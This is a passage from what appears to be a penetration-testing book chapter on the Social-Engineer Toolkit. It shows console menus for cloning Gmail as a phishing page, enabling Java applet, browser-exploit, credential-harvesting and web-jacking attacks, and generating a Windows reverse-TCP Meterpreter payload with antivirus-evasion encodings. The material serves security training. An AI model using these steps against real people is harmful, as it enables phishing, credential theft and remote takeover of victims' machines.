154
Chapter 10
Turning the Java Applet Attack Vector to ON
Select which attacks you want to use:
Enter your choice one at a time (hit 8 or enter to launch):
2
Turning the Metasploit Client Side Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.
Select which attacks you want to use:
Enter your choice one at a time (hit 8 or enter to launch):
6
Turning the Web Jacking Attack Vector to ON
Select which attacks you want to use:
. . . SNIP . . .
Enter your choice one at a time (hit 8 or enter to launch):
Begin configuring the attack by selecting
Multi-Attack Web Method
from the main menu, and then choose
Site Cloner
and enter the URL to
clone,
https://gmail.com
. Next, SET presents a menu of different attacks.
Select
The Java Applet Attack Method
, then
The Metasploit Browser Exploit
Method
, and finally, select
Web Jacking Attack Method
. You could also select
option 7,
Use them all - A.K.A. 'Tactical Nuke'
to enable all the attack vectors
automatically.
In the preceding example, notice that the flags have changed and that
the Java applet, Metasploit browser exploit, credential harvester, and web
jacking attack methods have all been enabled. To proceed, press
ENTER
or
choose option 8 (
I'm finished...
).
Enter your choice one at a time (hit 8 or enter to launch):
What payload do you want to generate:
Name: Description:
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send
back to attacker.
Enter choice (hit enter for default):
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
16. Backdoored Executable (BEST)